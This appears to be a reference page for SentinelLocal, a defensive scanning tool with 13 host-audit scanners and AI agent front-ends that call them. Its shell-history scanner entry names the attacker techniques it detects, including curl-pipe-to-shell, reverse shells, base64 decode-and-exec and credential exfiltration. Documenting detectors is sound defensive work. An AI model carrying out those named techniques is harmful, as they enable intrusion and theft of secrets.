Reference
Tools & scanners
SentinelLocal ships 13 deterministic scanners and three
agent front-ends. Findings carry a Severity and human-readable
summary, and can be emitted as pretty CLI, JSON, or SARIF v2.1.0.
Deterministic scanners
| Tool | Description |
|---|---|
scan_file | Static analysis of executables/scripts using goblin (PE/ELF/Mach-O), with hashing, suspicious-import detection, URL/IP extraction. |
yara_scan | Pure-Rust YARA matching via yara-x; ships a starter ruleset. |
scan_processes | Cross-platform process snapshot (sysinfo) with stalkerware/RAT name matching. |
scan_network | TCP/UDP socket enumeration (netstat2) with PID attribution and outbound-connection flagging. |
audit_persistence | Autostart auditor: systemd / cron / launchd / Windows Run keys. |
audit_scheduled | Time-based job auditor: Windows Scheduled Tasks, systemd timers, cron, launchd. |
audit_hosts_file | DNS-hijack detector for /etc/hosts and the Windows hosts file. |
scan_browser_extensions | Chrome / Edge / Brave / Firefox extension auditor — flags broad host & web-request permissions. |
recent_files | Surfaces files modified in the last N hours under temp / Downloads / cwd. |
ioc_lookup | Hashes files and matches them against a local IOC list (drop in MalwareBazaar / abuse.ch / your SOC's feed). |
audit_logs | Reads recent OS log entries via journalctl (Linux), Get-WinEvent (Windows), or log show (macOS); flags known-bad event IDs, error/fault levels, ssh/sudo failures. |
audit_shell_history | Scans bash / zsh / fish / PowerShell PSReadLine history for attacker patterns: curl-pipe-to-shell, IEX stagers, base64 decode-and-exec, reverse shells, credential exfiltration. |
monitor_snapshot | Re-snapshots processes + sockets at a fixed interval and reports the delta — catches short-lived droppers and beaconing connections a single snapshot would miss. |
Agent front-ends
| Command | Description |
|---|---|
agent | One-shot ReAct loop: the model plans, then calls the tools above in response to a natural-language goal. |
chat | Interactive terminal REPL — a persistent planning conversation with live plan / reasoning / tool / finding output. |
serve | Local HTTP chat UI for testing the agent interactively in a browser. |
Listing tools at runtime
sentinel tools lists every registered tool with its description.
Because tool descriptors are converted to OpenAI-style function definitions
on the fly, anything registered is automatically available to the agent — see
Contributing for how to add your own.